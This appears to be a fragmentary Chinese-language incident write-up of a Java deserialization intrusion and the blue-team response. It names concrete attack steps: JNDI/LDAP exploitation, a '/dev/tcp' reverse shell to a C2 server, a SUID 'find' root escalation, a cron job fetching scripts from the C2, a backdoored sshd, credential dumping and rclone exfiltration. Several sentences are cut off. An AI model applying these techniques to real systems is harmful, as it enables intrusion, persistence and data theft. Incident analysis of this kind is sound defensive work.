nuclei模板批量扫描确认漏洞存在。随后在GitHub上找到公开POC,发现其使用ysoserial生成CommonsCollections6链,但目标环境为JDK 11,原链失效。攻击者改用JNDI-Injection-Exploit搭建LDAP恶意服务,构造BasicDataSource反序列化触发点,绕过JDK高版本限制。/api/preview接口发送恶意序列化数据,触发JNDI注入。LDAP服务返回指向攻击者VPS的Exploit.class,目标服务器成功加载并执行。通过bash -i >& /dev/tcp/反弹Shell至C2。为规避检测,Shell进程伪装为[kworker/0:1],并利用LD_PRELOAD劫持readdir系统调用隐藏恶意文件。www-data权限。攻击者通过linpeas.sh发现/usr/bin/find存在SUID位,利用find . -exec /bin/sh -p \;提权至root。随后写入/etc/cron.d/backup定时任务,每5分钟从C2拉取update.sh执行,并替换/usr/sbin/sshd为带后门的版本,记录所有SSH凭据至隐藏目录。Impacket的wmiexec.py横向至数据库服务器。通过Mimikatz抓取域管哈希,psexec登录域控。最终使用7z分卷压缩核心业务数据,通过rclone上传至境外网盘。全程使用Proxifier+frp多层代理,流量伪装为HTTPS。find进程以root执行/bin/sh,同时Sysmon记录到sshd文件哈希变更。蓝队立即隔离主机,通过Velociraptor采集内存与进程树,确认cron后门和sshd后门。利用YARA规则扫描内网,发现同网段另有2台主机存在相同LD_PRELOAD劫持。最终通过防火墙封禁C2 IP,重置所有域凭据,并紧急修复组件漏洞。com.sun.jndi.ldap.object.trustURLCodebase=falseBloodHound分析域内攻击路径并清理多余特权